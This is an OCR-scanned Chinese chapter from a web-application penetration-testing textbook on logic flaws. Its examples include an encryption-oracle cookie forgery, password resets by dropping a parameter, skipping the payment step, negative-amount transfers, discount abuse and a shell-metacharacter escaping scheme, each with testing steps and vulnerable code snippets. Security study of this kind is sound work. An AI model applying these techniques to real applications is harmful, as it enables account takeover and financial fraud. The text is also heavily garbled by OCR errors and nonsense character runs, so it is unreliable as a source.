本 章 将 描述 各 种 常见 的 web 应 用 程序 逻辑 缺陷 ， 以 及 渗透 测试 员 在 
探查 与 攻击 应 用 程序 逻辑 时 需要 采取 的 实用 步骤 。 我 们 将 举 出 一 系列 实 
际 示 例 ， 每 个 示例 说 明 一 种 不 同 的 逻辑 缺陷 ， 它 们 共同 说 明 设 计 者 与 开 
Se 0 
洞 。 









































11.1 逻辑 缺陷 的 本 质 


Web 应 用 程序 中 的 逻辑 缺陷 各 不 相同 。 它 们 包括 代码 中 的 简单 错 
误 ， 以 及 几 种 应 用 程序 核心 组 件 互 操作 方面 的 极其 复杂 的 漏洞 。 有 时 
候 ， 这 些 缺 陷 非常 明显 ， 很 容易 发 现 ; 但 是 ， 有 些 缺 陷 可 能 极其 微妙 ， 
能 够 避 开 最 为 严格 的 代码 审查 或 渗透 调试 。 

与 5QL 注 入 或 跨 站 点 脚本 漏洞 不 同 ， 风 辑 缺 陷 没 有 共有 的 “签名 ”。 
当然 ， 定 义 特性 是 指 应 用 程序 执行 的 逻辑 存在 茶 种 缺陷 。 许 多 时 候 ， 远 
辑 缺 陷 表 现 为 设计 者 或 开发 者 在 思考 过 程 中 做 出 的 特殊 假设 存在 明显 或 
隐 伟 的 错误 。 简 单 来 讲 ， 程 序 员 可 能 这 样 认为 :“ 如 果 发 生 A， 束 一 定 会 
出 现 B， 因 此 我 执行 C。” 他 们 并 不 会 提出 截然 不 同 的 问题 “如 果 发 生 X 
会 怎样 ? ”因而 没有 考虑 到 假设 以 外 的 情形 。 在 许多 情况 下 ， 这 种 错误 
的 假设 会 造成 大 量 的 安全 漏洞 。 

近 些 年 来 ， 人 们 防范 第 见 Web 应 用 程序 漏洞 的 意识 已 经 增强 ， 一 些 
漏洞 的 出 现 几率 与 严重 程度 也 显著 降低 。 然 而 ， 鉴 于 过 和 辑 缺 陷 的 本 质 ， 
即使 是 实施 安全 开发 标准 、 使 用 代码 审查 工具 或 常规 渗透 测试 ， 我 们 仍 
然 无 法 避免 这 种 缺陷 。 逻 辑 缺 陷 的 多 样 性 本 质 ， 以 及 探查 与 防止 它们 往 
往 需要 从 各 个 不 同 的 角度 思考 问题 ， 预 示 着 在 很 长 一 段 时 期 内 ， 巡 辑 缺 
陷 仍 将 大 量 存在 。 因 此 ， 精 明 的 攻击 者 会 特别 注意 目标 应 用 程序 采用 的 
逻辑 方式 ， 设 法 了 解 设 计 者 与 开发 者 做 出 的 可 能 假设 ， 然 后 考 碟 如 何 攻 


破 这 些 假 设 。 


























11.2 现实 中 的 逻辑 缺陷 


掌握 理论 知识 并 不 是 了 解 逻辑 缺陷 的 最 佳 办 法 ， 通 过 实例 进行 学 习 
才 是 最 佳 途径 。 虽 然 各 种 逻辑 缺陷 之 间 存 在 巨大 的 差异 ， 但 它们 仍 包含 
一 些 共同 特征 ， 并 证 实 开 发 者 总 会 犯 各 种 各 样 的 错误 。 因 此 ， 从 研究 逻 
辑 缺 陷 实例 获得 的 启示 有 助 于 攻击 者 在 各 种 不 同 的 情况 下 发 现 新 的 缺 
陷 。 























笔者 曾 在 许多 不 同类 型 的 应 用 程序 中 发 现 “ 加 密 提 示 ? 漏 洞 。 攻 击 者 
可 以 利用 这 种 漏洞 实施 各 种 攻击 ， 如 解密 打印 软件 中 的 域 证 书 或 破坏 云 
— 下 面 是 这 种 漏洞 的 一 个 典型 示例 ， 是 在 一 个 软件 销售 站 点 上 发 现 

1. 功能 

该 应 用 程序 实施 “ 记 住 我 ”功能 ， 人 允许 应 用 程序 在 浏览 器 中 设置 一 个 
永久 cookie， 用 户 从 而 无 须 登录 即 可 访问 应 用 程序 。 这 个 cookie 受 到 一 
个 加 密 算 法 的 保护 ， 以 防止 自 改 或 披露 。 该 算法 基于 一 个 由 姓名 、 用 户 
ID 和 不 定数 据 组 成 的 字符 串 ， 以 确保 合成 值 是 唯一 的 ， 并 且 无 法 预测 。 
为 确保 能 够 访问 该 cookie 的 攻击 者 无 法 实施 重 放 攻击 ， 应 用 程序 还 收集 
机 器 专用 的 数据 ， 包 括 IP 地 址 。 

于 是 ， 这 个 cookie 被 视 为 一 个 可 靠 的 解决 方案 ， 用 于 保护 业务 功能 
中 易 受 攻击 的 部 分 。 

除 “ 记 住 我 ”功能 外 ， 该 应 用 程序 还 具有 男 一 项 功能 ， 将 用 户 的 昵称 
存储 在 一 个 名 为 ScreenName 的 cookie 中 。 这 样 ， 在 用 户 下 次 访问 该 站 点 
时 ， 就 可 以 在 站 点 的 角落 位 置 收 到 个 性 化 的 问候 。 鉴 于 这 个 名 称 也 属于 
安全 信息 ， 因 此 也 应 对 它 进 行 加 密 。 

2. 假设 

开发 者 认为 ， 与 RememberMe cookie 相 比 ，ScreenName cookie 对 攻 
击 者 而 言 价值 不 大 ， 于 是 他 们 决定 使 用 相同 的 加 密 算 法 来 保护 这 两 个 
cookie。 他 们 没有 考虑 到 的 是 ， 用 户 可 以 指定 目 己 的 昵称 ， 并 在 屏幕 上 
查看 该 名 称 。 这 在 无 意 间 使 用 户 能 够 访问 用 于 保护 永久 和 号 份 验证 令 牌 
RememberMe 的 加 密 功 能 (及 加 密 密 钥 ) 。 

3. 攻击 方法 

在 一 个 简单 的 攻击 中 ， 有 用户 提 交 其 RememberMe cookie 的 加 密 值 来 

















替代 加 密 的 ScreenName cookie。 在 向 用 户 显示 昵称 时 ， 应 用 程序 将 解密 
该 值 ， 如 果 解 密 成 功 ， 将 在 屏幕 上 显示 结果 。 这 个 过 程 生成 了 如 下 消 
息 : 


Welcome, marcus|734|192.168.4.282750184 


虽然 这 是 个 有 趣 的 问题 ， 但 不 一 定 是 个 高 风险 的 问题 。 它 只 是 说 
明 ， 攻 击 者 可 以 列 出 加 密 的 RememberMe cookie 的 内 容 ， 包 括 用 户 名 、 
用 户 ID 和 IP 地 址 。 由 于 cookie 中 没有 保存 密码 ， 攻 击 者 并 没有 办 法 对 获 
得 的 信息 立即 加 以 利用 。 

真正 的 问题 在 于 ， 用 户 能 够 指定 他 们 的 上 昵称。 因此 ， 用 户 可 以 选择 
上 自己 的 有 昵称， 例如: 


admin|1/192.168.4.282750184 


如 果 用 户 退 出 系统 然后 重新 登录 ， 应 用 程序 就 会 加 密 这 个 值 ， 将 它 
作为 加 密 的 ScreenName cookie 存 储 在 用 户 的 浏览 嚣 中。 如果 攻击 者 提交 
这 个 加 密 的 令 牌 ， 将 它 作 为 RememberMe cookie 的 值 ， 应 用 程序 就 会 解 
密 该 cookie， 读 取 用 户 ID， 并 让 攻击 者 以 管理 员 身 份 登录 。 即 使 应 用 程 
序 采 用 三 重 DES 加 密 ， 使 用 强大 的 密 钥 并 阻止 重 放 攻 击 ， 攻 击 者 仍然 可 
以 将 应 用 程序 作为 “加 密 提 示 ”， 以 解密 并 加 密 任意 值 。 
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这 种 类 型 的 漏洞 表现 在 许多 不 同 的 情况 下 ， 包 括 账户 恢复 令 
牌 ， 基 于 令 牌 访问 经 过 验证 的 资源 ;以 及 回 客 户 端 发 送 的 、 需 要 防 
算 改 或 对 用 户 不 可 读 的 任何 其 他 值 。 

(1) 在 应 用 程序 中 查找 任何 使 用 加 密 (而 非 散 列 〉 的 位 置 。 
确定 任何 应 用 程序 加 密 或 解密 用 户 提 交 的 值 的 位 置 ， 并 尝试 丛 代 在 
应 用 程序 中 发 现 的 任何 其 他 加 密 值 。 尝 试 在 应 用 程序 中 导致 可 以 揭 
示 加 密 值 ， 或 可 以 在 屏幕 上 “有 意 ” 显 示 加 密 值 的 错误 。 

(2) 确定 应 用 程序 中 可 以 通过 提交 加 密 值 导致 在 啊 应 中 显示 
对 应 的 解密 值 的 位 置 ， 以 查找 “提示 提示 ”漏洞 。 确 定 这 种 漏洞 是 舍 
会 导致 敏感 信息 (如 密码 或 信用 卡 〉 被 披露 。 

(3) 确定 可 以 通过 提交 明文 值 导致 应 用 程序 返回 对 应 的 加 密 
值 的 位 置 ， 以 人 查找“ 提示 加 密 ” 漏 洞 。 确 定 是 否 可 以 通过 指定 任意 
值 ， 或 应 用 程序 将 会 处 理 的 恶意 有 效 载 全 ， 对 这 种 汤 洞 加 以 利用 。 




















我 们 曾 在 一 家 金融 服务 公司 使 用 的 Web 应 用 程序 以 及 AOL AIM 企 业 
a 

1. 功能 

MAREE NA mH pE ARAD e “EBRD PSS A 4 
现 有 密码 、 新 密码 与 确认 新 密码 字段 。 

应 用 程序 还 为 管理 员 提 供 密 码 修改 功能 。 这 项 功能 允许 他 们 修改 任 
何 用 户 的 密码 ， 而 不 必 提 交 现 有 密码 。 这 两 项 功能 在 同一 个 服务 器 端 脚 
本 中 执行 。 

2. 假设 

应 用 程序 为 用 户 和 管理 员 提供 的 客户 器 界 面 仅 有 一 点 不 同 : 在 管理 
员 界 面 中 没有 用 于 填写 现 有 密码 的 字段 。 当 服务 器 端 应 用 程序 处 理 密码 
修改 请 求 时 ， 它 通过 其 中 是 否 包 含 现 有 密码 参数 确定 请 求 是 来 自 管理 
还 是 来 自 普 通用 户 。 换 句 话 说 ， 它 认为 普通 用 户 总 会 提交 现 有 和 密码 


O 
ies 
参数 。 

















负责 执行 这 项 功能 的 代码 如 下 : 


String existingPassword = request.getParameter ("existingPassword"); 


E {mull == existingPassword) 


trace("Old password not supplied, must be an administrator"); 


return true; 


trace("Veritying user's old password"); 


3. 攻击 方法 

一 旦 确定 开发 者 做 出 的 假设 后 ， 逻 辑 缺 陷 就 变 得 非常 明显 。 当 然 ， 
普通 用 户 也 可 以 提交 并 不 包含 现 有 密码 参数 的 请 求 ， 因 为 用 户 控制 着 他 
们 提出 的 请 求 的 每 一 个 方面 

这 种 逻辑 缺陷 可 能 给 应 用 程序 造成 巨大 破坏 。 攻 击 者 可 利用 这 种 缺 
陷 重 新 设置 任何 用 户 的 密码 ， 完 全 控制 他 们 的 账户 。 
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(1) 在 关键 功能 中 探查 逻辑 缺陷 时 ， 尝 试 轮流 删除 在 请 求 中 
提交 的 每 一 个 参数 ， 包 括 cookie、 查 询 字 符 串 字段 与 POST 数 据 项 。 

(2) 既 要 删除 参数 名 称 ， 也 要 删除 参数 值 。 不 要 只 提交 一 个 
空 字 符 串 ， 因 为 服务 器 会 对 这 种 字符 串 丸 做 处 理 。 

(3) 一 次 仅 攻击 一 个 参数 ， 确 保 到 达 应 用 程序 中 所 有 与 参数 
有 关 的 代码 路 径 。 

(4) 如 果 控 制 的 请 求 属于 多 阶段 过 程 ， 一 定 要 完成 整个 过 
程 ， 因 为 后 面 的 一 些 逻 辑 可 能 会 处 理 在 前 面 的 步骤 中 提交 并 在 会 话 
中 保存 的 数据 。 





11.2.3 (7/3: 直接 结 售 
我 们 曾 在 一 家 网 上 有 零售 商 使 用 的 Web 应 用 程序 中 发 现 过 这 种 逻辑 缺 


陷 。 

1. 功能 

下 订单 的 过 程 包括 以 下 步骤 。 

(1) 浏览 产品 目录 并 往 购物 车 中 添加 商品 。 

(2) 返回 购物 车 并 最 终 确认 订单 。 

(3) 输入 支付 信息 。 

(4) 输入 交 货 信息 。 

2. 假设 

开发 者 认为 用 户 总 会 按 预定 的 顺序 执行 每 一 个 步骤 ， 因 为 这 是 应 用 
程序 通过 显示 在 浏览 器 中 的 导航 链接 和 表单 向 用 户 提供 的 处 理 顺 序 。 因 
Fe ee Sete ie 

3. 攻击 方法 

很 明显 ， 开 发 者 的 假设 存在 缺陷 。 用 户 控 制 着 他 们 向 应 用 程序 提出 
的 每 一 个 请 求 ， 因 此 能 够 按 任何 顺序 访问 订购 过 程 的 每 一 个 阶段 。 如 果 
直接 从 第 (2) 步 进入 第 (4) 步 ， 攻 击 者 就 可 生成 一 个 最 终 确 定 交 货 、 
但 实际 上 并 未 支付 的 订单 。 
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发 现 并 利用 这 种 缺陷 的 技巧 叫 作 强制 浏览 ， 包 括 避 开 浏 览 器 导 
航 对 应 用 程序 功能 访问 顺序 实施 的 任何 控制 。 

(1) 如 果 一 个 多 阶段 过 程 需要 按 预 定 的 顺序 提交 一 系列 请 
求 ， 尝 试 按 其 他 顺序 提交 这 些 请 求 。 尝 试 完全 省 略 某 些 阶段 、 几 次 
访问 同一 个 阶段 或 者 推 后 访问 前 一 个 阶段 。 

(2) 这 些 阶 段 的 结果 可 通过 一 系列 指 问 特 殊 URL 的 GET 或 
POST 请 求 进行 访问 ， 或 者 需要 问 同 一 个 URL 提 区 不 同 的 参数 。 被 
访问 的 阶段 可 通过 在 被 请 求 的 参数 中 提交 功能 名 称 或 索引 来 指定 。 
确保 完全 了 解 应 用 程序 访问 特殊 阶段 所 使 用 的 机 制 。 

(3) 根据 执行 功能 的 情形 ， 试 图 了 解 开 发 者 做 出 的 假设 及 主 
要 受 攻 击 面 位 于 何人 处 。 设 法 找到 违反 这 些 假设 从 而 在 应 用 程序 中 造 
成 反常 行为 的 方法 。 

(4) 如 果 不 按 顺 序 访问 多 阶段 功能 ， 应 用 程序 常常 表现 出 一 
系列 异常 现象 ， 如 变量 值 为 空 字符 或 未 被 初始 化 、 状 态 仅 部 分 定义 
或 相互 矛盾 以 及 其 他 无 法 预料 的 行为 。 这 时 ， 应 用 程序 可 能 会 返回 
有 用 的 错误 消息 与 调试 结果 ， 可 用 于 充分 了 解 其 内 部 机 制 并 对 当前 
或 其 他 攻击 进行 优化 〈 请 参阅 第 15 章 了 解 相关 内 容 ) 。 有 时 ， 应 用 

陷 。 
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注解 ”许多 类 型 的 访问 控制 漏洞 与 这 种 逻辑 缺陷 类 似 。 如 
果 一 项 特权 功能 需要 完成 几 个 按 预 定 顺 序 访问 的 阶段 才能 实现 处 
理 ， 应 用 程序 可 能 认为 用 户 总 会 按 这 个 顺序 处 理 该 项 功能 。 应 用 程 
序 可 能 会 对 这 个 过 程 的 初始 阶段 实施 严格 的 访问 控制 ， 并 认为 任何 
到 达 后 面 阶段 的 用 户 一 定 已 经 获得 相关 授权 。 如 打 一 个 低 权限 的 用 
成 直接 进入 了 后 面 的 一 个 阶段 ， 他 就 能 够 无 限制 地 访问 这 个 功能 。 
请 参阅 第 8 半 了 解 便 找 并 利用 这 种 漏洞 的 详情 。 
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一 份 保险 申请 。 这 个 过 程 包括 如 下 几 个 阶段 。 
口 第 一 阶段 ， 申 请 人 提交 一 些 基本 信息 ， 并 指定 首选 月 保费 或 希望 
ee 


E ee 
WS Ruy. 

口 最 后 ， 应 用 程序 连接 一 名 为 保险 公司 工作 的 保险 员 。 保 险 员 使 用 
该 Web 应 用 程序 审核 申请 人 提交 的 信息 ， 并 决定 是 否 接受 申请 ， 或 者 修 
改 最 初 的 报价 以 反映 任何 额外 的 风险 。 

在 上 述 的 每 一 个 阶段 中 ， 应 用 程序 使 用 一 个 共享 组 件 处 理 用 户 提交 
的 每 一 个 参数 。 这 个 组 件 将 每 个 POST 请 求 中 的 所 有 数据 解析 成 名 / 值 
a 

2. 假设 

处 理 用 户 提 交 的 数据 的 组 件 认为 每 个 请 求 仅 包含 用 户 在 相关 HTML 
表单 中 提交 的 参数 。 而 开发 者 并 未 考虑 到 这 种 情形 : 如 果 一 名 用 户 提 交 
了 应 用 程序 并 不 希望 他 提交 的 参数 ， 将 会 出 现 什么 情况 。 

3. WHA 

上 述 假设 当然 存在 缺陷 ， 因 为 用 户 可 在 每 个 请 求 中 提交 任意 参数 与 
参数 值 。 因 此 ， 应 用 程序 的 核心 功能 有 许多 不 完善 的 地 方 。 

口 攻 击 者 可 以 利用 共享 组 件 避 开 所 有 服务 器 端的 输入 确认 。 在 报价 
过 程 的 每 一 个 阶段 ， 应 用 程序 对 这 些 阶 段 提 交 的 数据 执行 严格 的 确认 ， 
并 拒绝 任何 未 通过 这 种 确认 的 数据 。 但 是 ， 共 享 组 件 使 用 用 户 提交 的 每 
一 个 参数 更 新 应 用 程序 的 状态 。 因 此 ， 如 果 攻 击 者 提供 应 用 程序 在 较 早 
阶段 需要 的 一 个 名 / 值 对 ， 不 按 顺序 提交 数据 ， 那 么 应 用 程序 将 不 对 其 
进行 任何 确认 ， 直 接 接受 并 处 理 该 数据 。 如 果 出 现 这 种 情况 ， 恶 意 用 户 
就 可 以 据 此 实施 针对 保险 员 的 保存 型 跨 站 点 脚本 攻击 ， 访 问 属于 其 他 应 
用 程序 的 个 人 信息 (请 参阅 第 12 章 了 解 相关 内 容 )。 

口 攻击 者 能 够 以 任意 价格 购买 保险 。 在 报价 过 程 的 第 一 阶段 ， 申 请 
人 指定 他 们 首选 的 月 保费 或 希望 投保 的 金额 ， 应 用 程序 据 此 计算 其 他 
值 。 然 而 ， 如 果 用 户 在 后 续 某 个 阶段 为 上 面 的 一 个 或 几 个 数据 项 提交 新 
的 值 ， 那 么 应 用 程序 将 根据 这 些 值 更 新 自己 的 状态 。 不 按 顺 序 提交 这 些 























参数 ， 攻 击 者 就 可 以 获得 任意 价格 的 保险 报价 及 任意 月 保费 。 

口 应 用 程序 并 不 对 茶 一 类 用 户 能 够 提交 哪些 参数 实施 访问 控制 。 当 
保险 员 审 核 完成 的 申请 时 ， 他 们 会 更 新 各 种 数据 ， 包 括 做 出 承保 决定 。 
这 些 数据 由 处 理 普 通用 户 提 有 交 的 数据 的 同一 个 共 圣 组 件 处 理 。 如 果 攻 击 
者 知道 或 猜测 出 保险 员 在 审查 申请 时 使 用 的 参数 名 称 ， 就 可 以 提交 这 些 
参数 ， 不 用 签署 保单 即 可 接受 自己 的 申请 。 
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这 些 缺 陷 可 严重 危及 应 用 程序 的 安全 ， 但 是 ， 如 果 攻 击 者 仅 搓 

Bn Dele See ea 
陷 。 

C1) 只 要 应 用 程序 通过 几 个 阶段 执行 一 项 关键 操作 ， 殊 应 该 
提取 在 杀 个 阶段 提交 的 参数 ， 然 后 尝试 在 力 一 个 阶段 所 交 这 些 参 
数 。 如 果 相 关 数 据 随 应 用 程序 的 状态 一 起 更 新 ， 应 该 探索 这 种 行为 
的 衔 生效 果 ， 确 定 是 舍 可 以 利用 它 实 施 任何 恶意 操作 ， 如 前 面 的 3 
个 示例 所 述 。 

(2) 如 果 应 用 程序 执行 一 项 功能 ， 不 同类 型 的 用 户 可 根据 一 
组 共同 的 数据 更 新 或 执行 其 他 操作 ， 应 该 利用 每 种 类 型 的 用 户 执行 
该 功能 并 观察 他 们 提交 的 参数 。 如 果 不 同 的 用 户 提交 不 同 的 参数 ， 
束 提 取 由 一 名 用 户 提交 的 每 个 参数 ， 并 笃 试 以 其 他 用 户 的 里 份 提交 
这 些 参 数 。 如 果 应 用 程序 接受 并 处 理 这 些 参数 ， 如 前 面 所 述 ， 探 索 
这 种 行为 的 衍生 效果 。 








11.2.5 5: 受 银行 


我 们 曾 在 一 家 大 型 金融 服务 公司 使 用 的 Web 应 用 程序 中 过 到 过 这 种 
逻辑 缺陷 。 

1. 功能 

应 用 程序 允许 尚未 使 用 在 线 应 用 程序 的 顾客 进行 注册 。 然 后 ， 应 用 
程序 要 求 新 用 户 提 供 一 些 基 本 的 个 人 信息 ， 在 一 定 程度 上 确认 他 们 的 身 
份 。 这 些 信息 包含 姓名 、 地 址 和 出 生日 期 ， 但 并 不 包括 任何 机 密 信 息 ， 
如 现 有 密码 或 PIN 号 码 。 

顾客 正确 输入 这 些 信息 后 ， 应 用 程序 再 将 注册 请 求 转交 给 后 端 系统 
处 理 。 然 后 ， 再 向 用 户 注 册 的 家 庭 地 址 邮寄 一 个 信息 包 训 。 包 囊 内 含有 
如 何 通过 给 公司 呼叫 中 心 拨打 电话 激活 在 线 访 问 的 指导 ， 以 及 用 户 在 第 

2， 假 设 


应 用 程序 的 设计 者 认为 这 种 机 制 可 为 防止 未 授权 访问 提供 强大 的 保 








护 。 该 机 制 实施 以 下 3 层 保护 。 

口 应 用 程序 要 求 用 户 提 前 输入 一 部 分 个 人 信息 ， 阻 止 恶意 攻击 者 或 
恶作剧 用 户 以 其 他 用 户 的 身份 进行 注册 。 

口 注 册 过 程 包括 以 非常 规 邮 寄 的 形式 回顾 客 注册 的 家 庭 地 址 传送 一 
T E E E E 

口 注册 功能 要 求 顾客 给 呼叫 中 心 拨 打 电 话 ， 并 根据 个 人 信息 与 在 
PIN 号 码 中 选择 的 数字 ， 以 币 规 方式 核实 他 们 的 吴 份 。 

这 种 设计 确实 非常 安全 。 但 是 ， 该 机 制 的 实际 执行 过 程 存在 逻辑 缺 
fio 

执行 注册 机 制 的 开发 者 需要 以 菜 种 方式 保存 用 户 提交 的 个 人 信息 ， 
并 将 它们 与 公司 数据 库 中 储存 的 客户 身份 天 联 起 来 。 由 于 希望 重复 利用 
现 有 代码 ， 他 们 使 用 以 下 这 个 似乎 能 够 满足 要 求 的 类 : 


class CCustomer 




















{ 
String firstName; 
String lastName; 
CDoB dob; 


CAddress homeAddress; 
long custNumber; 





获得 用 户 信 息 后 ， 这 个 对 象 被 实例 化 ， 与 提交 的 信息 一 起 保存 在 用 
户 会 话 中 。 然 后 ， 应 用 程序 核对 用 户 信息 ， 如 果 信 息 有 效 ， 就 给 该 用 户 
分 配 一 个 唯一 的 顾客 号 码 ， 并 将 其 用 在 公司 的 所 有 系统 中 。 随 后 ， 应 用 
程序 将 这 个 号 码 连同 用 户 的 其 他 一 些 有 用 信息 ， 一 起 添加 到 这 个 对 象 
中 。 最 后 ， 这 个 对 象 被 传送 至 处 理 注册 请 求 的 后 端 系 统 进行 处 理 。 

开发 者 认为 使 用 这 个 代码 组 件 并 无 妨碍 ， 不 会 造成 任何 安全 问题 。 
然而 ， 这 种 错误 的 假设 可 能 会 造成 严重 的 后 果 。 

3. 攻击 方法 

应 用 程序 的 其 他 功能 (包括 核心 功能 ) 也 使 用 合并 到 注册 功能 中 的 
相同 代码 组 件 ， 核 心 功能 允许 通过 验证 的 用 户 访问 账户 、 账 目 、 转 账 和 
其 他 信息 。 一 名 注册 用 户 成 功 通过 应 用 程序 的 验证 后 ， 这 个 对 象 也 被 实 











例 化 ， 并 保存 在 他 的 会 话 中 ， 用 于 存储 与 其 身份 有 关 的 关键 信息 。 应 用 
程序 的 绝 大 多 数 功 能 在 执行 操作 时 引用 这 个 对 象 中 保存 的 信息 。 例 如 ， 
RT 的 唯一 顾客 号 码 生 成 在 用 户主 页 面 显示 
可 人 PgR. 

应 用 程序 的 其 他 功能 已 经 使 用 这 个 代码 组 件 ， 意 味 着 开发 者 的 假设 
存在 缺陷， 应 用 程序 重复 使 用 它们 的 方式 确实 会 造成 一 个 巨大 的 漏洞 。 

虽然 这 个 漏洞 非常 严重 ， 但 实际 上 我 们 很 难 发 现 并 利用 这 个 漏洞 。 
应 用 程序 的 主要 功能 受到 几 层 访问 控制 的 保护 ， 用 户 需 要 拥有 一 个 完 
合法 的 会 话 才能 通过 这 些 控 制 。 因 此 ， 为 利用 这 个 逻辑 缺陷 ， 攻 击 者 需 
要 执行 以 下 步骤 。 

口 使 用 他 目 己 的 有 效 账户 证 书 登 录 应 用 程序 。 

O 使 用 登录 后 得 到 的 通过 验证 的 会 话 ， 访 问 注册 功能 并 提交 另 一 名 
顾客 的 个 人 人 信息。 这样， 应 用 程序 就 会 用 一 个 与 目标 顾客 有 关 的 对 象 ， 
重 写 攻击 者 会 话 中 最 初 的 CCustomer 对 象 。 

口 返 回应 用 程序 主要 功能 并 访问 其 他 顾客 的 账户 。 

从 “ 黑 盒 ”角度 探查 应 用 程序 时 ， 这 种 漏洞 并 不 明显 。 同 时 ， 当 审查 
或 编写 源 代 码 时 ， 我 们 也 很 难 发 现 它 。 如 果 未 能 明确 、 全 面 地 了 解 应 用 
程序 及 其 在 不 同 区 域 使 用 的 各 种 组 件 ， 我 们 可 能 无 法 知道 开发 者 做 出 的 
错误 假设 。 当 然 ， 添 加 明确 注释 的 源 代 码 与 设计 文档 也 有 助 于 降低 引入 
或 探测 不 到 这 种 缺陷 的 可 能 性 。 









































渗透 测试 步 又 


(1) 在 一 个 需要 隅 离 水 平权 限 或 垂直 权限 的 复 洒 应 用 程序 
中 ， 设 法 确定 个 体 用 户 能 够 在 会 话 中 “聚积 ”大 量 与 其 喘 份 有 关 的 状 
态 信息 的 所 有 情况 。 

(2) 尝试 浏览 一 个 功能 区 域 ， 然 后 转换 到 男 一 个 完全 无 关 的 
ici 
Ha] 。 











11.2.6 16: 规避 区 | 


我 们 在 一 家 制造 公司 使 用 的 基于 Web 企 业 资 源 规划 的 应 用 程序 中 发 
现 过 这 种 逻辑 缺陷 。 





账户 之 间 进 行 转账 。 为 防止 金融 欺诈 ， 应 用 程序 将 大 多 数 用 户 的 转账 金 
额 限制 在 10 000 美 元 之 内 。 如 果 转 账 金额 超出 这 个 限制 ， 就 需要 得 到 高 
级 经 理 的 批准 。 

2. 假设 

应 用 程序 中 负责 金额 检查 的 代码 极其 简单 : 

bool CAuthCheck: :RequiresApproval(int amount) 


{ 





if (amount <= m_apprThreshold) 
return false; 
else return true; 
} 
开发 者 认为 这 种 透明 的 检查 非常 安全 。 如 果 转 账 金 额 超出 预先 设 定 
的 限制 ， 只 有 得 到 高 级 经 理 的 许可 交易 才能 进行 。 
3. Bob AE 
开发 者 的 假设 存在 缺陷 ， 因 为 他 完全 忽略 了 用 户 用 负 人 金额 进 行 转账 





的 可 能 性 。 由 于 任何 负 值 都 小 于 转账 金额 限制 ， 因 此 不 需要 得 到 进一步 

的 批准 。 但 是 ， 应 用 程序 的 银行 模块 接受 负 值 转账 ， 并 以 反问 正 值 转账 

的 形式 对 其 进行 处 理 。 因 此 ， 如 果 用 己 和 希 望 从 A 账 尸 转账 20 000 美 元 到 B 

账户 ， 他 只 需 从 B 账 户 转账 -20 000 美 元 到 A 账 户 ， 即 可 得 到 相同 的 效 

人 
| 


=) 3 








a 许多 Web 应 用 程序 在 它们 的 交易 逻辑 中 采用 数字 限 
Ail, yl H: 

口 零售 应 用 程序 禁止 用 户 订购 超出 其 库存 量 的 商品 ; 

口 银行 应 用 程序 禁止 用 户 支 付 超出 其 当前 账户 余额 的 账单 ，; 

口 保险 应 用 程序 根据 年 龄 限制 调整 报价 。 

找到 规避 这 个 限额 的 方法 通常 并 不 表示 应 用 程序 存在 安全 漏 
洞 。 但 是 ， 这 样 做 会 造成 严重 的 商业 后 果 ， 并 表示 所 有 者 依赖 应 用 
程序 实施 的 控制 存在 缺陷 。 

在 发 布 应 用 程序 前 执行 的 用 户 验 收 测 试 过 程 中 ， 我 们 通常 可 以 
检测 出 最 明显 的 漏洞 。 然 而 ， 隐 藏 较 深 的 漏洞 依然 存在 ， 特 别 是 操 
纵 隐藏 参数 造成 的 漏洞 。 














符 试 规避 交易 限 制 的 第 一 步 是 了 解 受 控制 的 相关 输入 接受 哪些 


C1) 尝试 输入 负 值 ， 看 应 用 程序 是 否 接 受 这 些 值 并 按 预 想 的 
方式 对 它们 进行 处 理 。 

(2) 可 能 需要 执行 儿 步 操作 ， 改 和 变 应 用 程序 的 状态 ， 使 其 对 
攻击 有 用 。 例 如 ， 可 能 需要 在 账户 之 间 进 行 几 次 转账 ， 直 到 得 到 可 
提取 的 适当 余额 。 

















11.2.7 例 7:， 获得 大 幅 


EE ee ee 
1. 功能 

应 用 程序 允许 用 户 订 购 软 件 产 品 ， 如 果 购 买 的 商品 达到 一 定数 量 ， 
就 有 资格 获得 大 幅 折 扣 。 例 如 ， 如 果 用 户 分 别 购 买 了 一 款 防 病毒 解决 方 
ee NE ee al 

2. 假设 

当 用 户 在 购物 车 中 增加 一 件 商品 时 ， 应 用 程序 就 使 用 各 种 规则 决定 
他 选择 购买 的 产品 是 否 让 他 有 资格 获得 任何 折扣 。 如 果 用 户 可 以 获得 折 
扣 ， 应 用 程序 就 根据 折扣 率 调 整 购物 车 中 的 商品 价格 。 开 发 者 认为 用 户 
只 有 购买 捆绑 销售 的 商品 ， 才 能 获得 折扣 。 

3. 攻击 方法 

开发 者 的 假设 存在 相当 明显 的 缺陷 ， 因 为 该 假设 忽略 了 一 个 事实 ， 
即 用 户 问 购物 车 中 添加 商品 后 可 能 会 再 将 其 从 中 移 走 。 狐 独 的 用 户 可 能 
会 往 购物 车 中 添加 供应 商 出 售 的 大 量 产 品 ， 以 获得 最 大 可 能 的 折扣 。 当 
购物 车 中 的 商品 可 以 采用 折扣 时 ， 他 就 会 把 不 需要 的 商品 从 中 取 走 ， 而 
购物 车 中 剩 下 的 商品 仍然 可 以 享受 原来 的 折扣 。 





渗透 测试 步 又 


D 如 果 有 任何 价格 或 其 他 敏感 价值 需要 根据 用 户 控 制 的 数 
据 或 操作 确定 的 标准 进行 调整 ， 首 先 应 了 解 应 用 程序 使 用 的 算法 以 
及 需要 调整 的 逻辑 。 确 定 这 些 调整 是 一 次 性 行为 ， 还 是 需要 根据 用 
户 执行 的 其 他 操作 进行 修改 。 

(2) 发 挥 想 象 ， 努 力 想 出 操纵 应 用 程序 行为 的 办 法 ， 使 应 用 
程序 进行 的 调整 与 开发 者 最 初 设 定 的 标准 相互 让 盾 。 如 前 所 述 ， 在 
应 用 折扣 后 再 从 购物 车 中 取出 商品 束 是 最 典型 的 示例 。 








11.2.8” 例 8:， 避 


我 们 曾 在 各 种 Web 应 用 程序 中 遇 到 过 这 种 逻辑 缺陷 ， 包括 一 天 网 络 
= eee 

1. 功能 

应 用 程序 的 设计 者 决定 执行 茶 种 功能 ， 该 功能 需要 以 目 变 量 的 形式 
向 操作 系统 命令 提交 用 户 控制 的 输入 。 应 用 程序 的 开发 者 知道 这 种 操作 
包含 着 内 在 的 风险 《请 参见 第 9 章 了 解 相关 内 容 ) ， 并 决定 净化 用 户 输 
入 中 出 现 的 任何 潜在 的 恶意 人 字符， 从 而 防御 这 种 风险 。 下 面 的 字符 都 需 
要 使 用 反 斜 线 (\) 进行 转 义 : 


7 | & < 党 空格 和 换行 蔡 


以 这 种 方式 进行 转 义 后 ，shell 命 令 解释 器 就 把 它们 当做 提交 给 被 调 
